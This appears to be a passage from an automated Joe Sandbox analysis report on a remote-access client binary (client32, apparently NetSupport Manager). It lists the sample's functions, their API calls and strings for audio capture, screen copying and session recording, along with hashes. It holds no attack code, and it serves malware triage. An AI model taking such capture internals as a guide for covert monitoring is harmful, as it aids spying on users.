                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ClassRegister$CriticalSection$ClipboardCursorFormatInfoLeaveLoad$Enter__recalloc_memset
                                                                                                                              • String ID: AtlAxWin100$AtlAxWinLic100$WM_ATLGETCONTROL$WM_ATLGETHOST
                                                                                                                              • API String ID: 2220097787-1587594278
                                                                                                                              • Opcode ID: 8be8c82d578b7ce9cf9cc495cb365543be575607f387d856cefed87b35aa24b4
                                                                                                                              • Instruction ID: 380367346e18165f725bae6bc82d4f79de56b371e9301c8febdab5dbf058e0d0
                                                                                                                              • Opcode Fuzzy Hash: 8be8c82d578b7ce9cf9cc495cb365543be575607f387d856cefed87b35aa24b4
                                                                                                                              • Instruction Fuzzy Hash: 854179B5D02229ABCB01DFD9E984AEEFFB9FB48714F50406AE415B3200DB351A44CFA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1100B440 Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 190fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                              • _malloc.LIBCMT ref: 1100B496
                                                                                                                                • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                                                                • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                                                                • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                                                                                • Part of subcall function 1100AD10: EnterCriticalSection.KERNEL32(000000FF,30AC22AD,?,00000000,00000000), ref: 1100AD54
                                                                                                                                • Part of subcall function 1100AD10: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1100AD72
                                                                                                                                • Part of subcall function 1100AD10: GetProcAddress.KERNEL32(?,CancelIo), ref: 1100ADBE
                                                                                                                                • Part of subcall function 1100AD10: InterlockedExchange.KERNEL32(?,000000FF), ref: 1100AE05
                                                                                                                                • Part of subcall function 1100AD10: CloseHandle.KERNEL32(00000000), ref: 1100AE0C
                                                                                                                                • Part of subcall function 1100AD10: _free.LIBCMT ref: 1100AE23
                                                                                                                                • Part of subcall function 1100AD10: FreeLibrary.KERNEL32(?), ref: 1100AE3B
                                                                                                                                • Part of subcall function 1100AD10: LeaveCriticalSection.KERNEL32(?), ref: 1100AE45
                                                                                                                              • EnterCriticalSection.KERNEL32(1100CB8A,Audio,DisableSounds,00000000,00000000,30AC22AD,?,1100CB7A,00000000,?,1100CB7A,?), ref: 1100B4CB
                                                                                                                              • CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000,?,1100CB7A,?), ref: 1100B4E8
                                                                                                                              • _calloc.LIBCMT ref: 1100B519
                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,1100CB7A,?), ref: 1100B53F
                                                                                                                              • LeaveCriticalSection.KERNEL32(1100CB8A,?,1100CB7A,?), ref: 1100B579
                                                                                                                              • LeaveCriticalSection.KERNEL32(1100CB7A,?,?,1100CB7A,?), ref: 1100B59E
                                                                                                                              Strings
                                                                                                                              • Audio, xrefs: 1100B477
                                                                                                                              • Error. Vista AddAudioCaptureEventListener ret %s, xrefs: 1100B64C
                                                                                                                              • InitCaptureSounds NT6, xrefs: 1100B5BE
                                                                                                                              • \\.\NSAudioFilter, xrefs: 1100B4E0
                                                                                                                              • Vista AddAudioCapEvtListener(%p), xrefs: 1100B623
                                                                                                                              • Vista new pAudioCap=%p, xrefs: 1100B603
                                                                                                                              • DisableSounds, xrefs: 1100B472
                                                                                                                              • Error. Vista AudioCapture GetInstance ret %s, xrefs: 1100B5F3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CriticalSection$Leave$CreateEnterLibrary$AddressAllocateCloseEventExchangeFileFreeHandleHeapInterlockedLoadProc__wcstoi64_calloc_free_malloc
                                                                                                                              • String ID: Audio$DisableSounds$Error. Vista AudioCapture GetInstance ret %s$Error. Vista AddAudioCaptureEventListener ret %s$InitCaptureSounds NT6$Vista AddAudioCapEvtListener(%p)$Vista new pAudioCap=%p$\\.\NSAudioFilter
                                                                                                                              • API String ID: 1843377891-2362500394
                                                                                                                              • Opcode ID: 788e0705a54604f3c116cda4417d9a8be816fa3697837fe15ff9585a3d24913c
                                                                                                                              • Instruction ID: 79732c4921e51442e8b050610a6755ede2f12e6e97fc197f43339bcf40ac1e73
                                                                                                                              • Opcode Fuzzy Hash: 788e0705a54604f3c116cda4417d9a8be816fa3697837fe15ff9585a3d24913c
                                                                                                                              • Instruction Fuzzy Hash: A25129B5E44A4AEFE704CF64DC80B9AF7A4FB05359F10467AE92993240E7317550CBA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11018460 Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 151COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,775EC740), ref: 11145CA0
                                                                                                                                • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                                                                • Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
                                                                                                                                • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
                                                                                                                                • Part of subcall function 110183B0: GetSystemMetrics.USER32 ref: 110183BF
                                                                                                                                • Part of subcall function 110183B0: GetSystemMetrics.USER32 ref: 110183DF
                                                                                                                              • FindWindowA.USER32 ref: 110184C1
                                                                                                                              • GetWindowRect.USER32 ref: 110184D9
                                                                                                                              • GetWindowLongA.USER32 ref: 11018511
                                                                                                                              • GetWindowLongA.USER32 ref: 11018518
                                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000104,?,?,?,00000104), ref: 110185B8
                                                                                                                              • wsprintfA.USER32 ref: 11018608
                                                                                                                                • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                                                                              Strings
                                                                                                                              • OpenKbd keyrect(L=%d, T=%d, R=%d, B=%d), xrefs: 110184FB
                                                                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 11018583
                                                                                                                              • SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\TabTip.exe, xrefs: 11018551
                                                                                                                              • c:\program files\common files\microsoft shared\ink\tabtip.exe, xrefs: 110185C5
                                                                                                                              • IsA(), xrefs: 11018588
                                                                                                                              • IPTip_Main_Window, xrefs: 110184BC
                                                                                                                              • open, xrefs: 11018634
                                                                                                                              • OpenKbd. No touch kbd, xrefs: 1101865D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$LongMetricsSystem$EnvironmentExpandFindOpenRectStringsVersion_free_memset_strncpywsprintf
                                                                                                                              • String ID: IPTip_Main_Window$IsA()$OpenKbd keyrect(L=%d, T=%d, R=%d, B=%d)$OpenKbd. No touch kbd$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\TabTip.exe$c:\program files\common files\microsoft shared\ink\tabtip.exe$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$open
                                                                                                                              • API String ID: 3321471459-1061909023
                                                                                                                              • Opcode ID: 15256178f2c473d2d334685a5e7146fba412686c222059a35c988bc5f98f3eed
                                                                                                                              • Instruction ID: 32505dac5387f753d5f4a5d6101e8c76b8228c83072960b34001c442d9572215
                                                                                                                              • Opcode Fuzzy Hash: 15256178f2c473d2d334685a5e7146fba412686c222059a35c988bc5f98f3eed
                                                                                                                              • Instruction Fuzzy Hash: FB51CF75D0122DABDB10DB64CD85FEEB7B4EB05714F1002D5E9296B2C4EB74AB40CBA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1101E200 Relevance: 25.7, APIs: 17, Instructions: 151COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Item$Rect$Window$Client
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3380545214-0
                                                                                                                              • Opcode ID: b3566e995a24d8da3f6e69c6acb85c898b2ca1eab53628bbe20bfaa9425c3900
                                                                                                                              • Instruction ID: 41ef9526c6eaf87700d550f6f9343ba82b807524fb7f7e91883361a4ab14b296
                                                                                                                              • Opcode Fuzzy Hash: b3566e995a24d8da3f6e69c6acb85c898b2ca1eab53628bbe20bfaa9425c3900
                                                                                                                              • Instruction Fuzzy Hash: 064121797403053AD634E676CCA5F9F669D9BC4B04F104C2CB25BAB5C1C9A5FD808FA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 110061F0 Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 358COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • ReleaseDC.USER32 ref: 11006267
                                                                                                                              • InflateRect.USER32(?,?,?), ref: 11006306
                                                                                                                              • SelectObject.GDI32(?,?), ref: 1100632D
                                                                                                                              • MoveToEx.GDI32(?,?,?,00000000), ref: 110063D5
                                                                                                                              • LineTo.GDI32(?,?,?), ref: 11006410
                                                                                                                              • Polygon.GDI32(?,?,00000003), ref: 110064C8
                                                                                                                              • SelectObject.GDI32(?,?), ref: 110064DC
                                                                                                                              • SelectObject.GDI32(?,?), ref: 110064E6
                                                                                                                              • InflateRect.USER32(?,?,?), ref: 11006522
                                                                                                                              • SelectObject.GDI32(?,?), ref: 1100633D
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              • GetDC.USER32(00000000), ref: 11006569
                                                                                                                                • Part of subcall function 11002620: SetROP2.GDI32(?,00000007), ref: 11002631
                                                                                                                                • Part of subcall function 11002620: SelectObject.GDI32(?,?), ref: 11002642
                                                                                                                                • Part of subcall function 11002620: MoveToEx.GDI32(?,?,?,00000000), ref: 110026AF
                                                                                                                                • Part of subcall function 11002620: LineTo.GDI32(?,00000000,?), ref: 110026E6
                                                                                                                              • __floor_pentium4.LIBCMT ref: 11006621
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ObjectSelect$InflateLineMoveRect$ErrorExitLastMessagePolygonProcessRelease__floor_pentium4wsprintf
                                                                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                              • API String ID: 4043586968-2830328467
                                                                                                                              • Opcode ID: f40b548af5a3b969317c6371caf9fc461ff3c483ba902ae5864a027bb338f110
                                                                                                                              • Instruction ID: 40ef36492cbbdd63dd1a1365ef49c9bea88dfca2d0282d7a726c9572eb38d0e4
                                                                                                                              • Opcode Fuzzy Hash: f40b548af5a3b969317c6371caf9fc461ff3c483ba902ae5864a027bb338f110
                                                                                                                              • Instruction Fuzzy Hash: 75E14BB4E00B09DBCB14DFA9D984ADEFBF8FF48308F104529D46AA7254DB31A965CB50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11004480 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 160windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateCompatibleDC.GDI32(?), ref: 110044B4
                                                                                                                              • CreateCompatibleBitmap.GDI32(?,?,?), ref: 110044E3
                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 110044F2
                                                                                                                              • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 11004526
                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 11004531
                                                                                                                              • SelectObject.GDI32(00000000), ref: 1100454C
                                                                                                                              • BitBlt.GDI32(?,?,?,?,?,00000000,00000000,00000000,00CC0020), ref: 11004580
                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 1100458B
                                                                                                                              • DeleteDC.GDI32(00000000), ref: 11004592
                                                                                                                              • DeleteObject.GDI32(00000000), ref: 110045A3
                                                                                                                              • InvalidateRect.USER32(00000000,?,00000000), ref: 1100461F
                                                                                                                              • InvalidateRect.USER32(00000000,00000000,00000000), ref: 11004650
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Object$Select$CompatibleCreateDeleteInvalidateRect$Bitmap
                                                                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                              • API String ID: 2105970896-2830328467
                                                                                                                              • Opcode ID: 44e2563ee580fda99f72b7f2e742394cd111089d0a70a0d9a687529fd03971b7
                                                                                                                              • Instruction ID: eb1414bd8fd2e4592000e36fc3863a3a49f4a7efc2cb9f7a10422fdc8de4f52e
                                                                                                                              • Opcode Fuzzy Hash: 44e2563ee580fda99f72b7f2e742394cd111089d0a70a0d9a687529fd03971b7
                                                                                                                              • Instruction Fuzzy Hash: 065147B5A40B059FD729CF68C885BBBB7F9FB88304F51456CE5AAD3244D770B8418B50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 110CF130 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 239COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$Rect$ClientCreateItemLongObjectShowText
                                                                                                                              • String ID: ..\ctl32\nsmdlg.cpp$Static$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_eh$m_hWnd
                                                                                                                              • API String ID: 4172769820-2231854162
                                                                                                                              • Opcode ID: 5ff20c6de973b460835991edd20fe79b0e2adce95af528326ea5386cfac745a0
                                                                                                                              • Instruction ID: 2d84ac58a4c57407e54c3cb5711102d4444eebaf719169cc73b89b5b27c55d8a
                                                                                                                              • Opcode Fuzzy Hash: 5ff20c6de973b460835991edd20fe79b0e2adce95af528326ea5386cfac745a0
                                                                                                                              • Instruction Fuzzy Hash: 8F81C375E00716ABD721CF64CC85F9EB3F4BB88B08F0045ADE5569B680EB74A940CF92
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1110F3F0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 218fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • EnterCriticalSection.KERNEL32(0000017D,30AC22AD,0000017D,?,?,?,?,?,?,?,?,1118B168,000000FF,?,1110F947,00000001), ref: 1110F427
                                                                                                                              • _memset.LIBCMT ref: 1110F4C2
                                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 1110F4FA
                                                                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1110F58E
                                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 1110F5B9
                                                                                                                              • WriteFile.KERNEL32(?,PCIR,00000030,?,00000000), ref: 1110F5CE
                                                                                                                                • Part of subcall function 11110000: InterlockedDecrement.KERNEL32(?), ref: 11110008
                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,1118B168,000000FF), ref: 1110F5F5
                                                                                                                              • _free.LIBCMT ref: 1110F628
                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1110F665
                                                                                                                              • timeEndPeriod.WINMM(00000001), ref: 1110F677
                                                                                                                              • LeaveCriticalSection.KERNEL32(0000017D,?,?,?,?,?,?,?,1118B168,000000FF,?,1110F947,00000001,30AC22AD,0000017D,00000001), ref: 1110F681
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: File$CloseCriticalHandlePointerSectionWrite$DecrementEnterInterlockedLeavePeriod_free_memsettime
                                                                                                                              • String ID: End Record %s$PCIR
                                                                                                                              • API String ID: 4278564793-2672865668
                                                                                                                              • Opcode ID: 2297d0fbe9251eaeeb3cc25f45a368d5b625df3f620643443588fc5d57948bb5
                                                                                                                              • Instruction ID: c7b3bd1ea8319edfd3cc52dfdc755cda258f2b25611d18eaf89bf58ef2166273
                                                                                                                              • Opcode Fuzzy Hash: 2297d0fbe9251eaeeb3cc25f45a368d5b625df3f620643443588fc5d57948bb5
                                                                                                                              • Instruction Fuzzy Hash: 32811875A0070AABD724CFA4C881BEBF7F8FF88704F00492DE66A97240D775A941CB91
                                                                                                                              Uniqueness

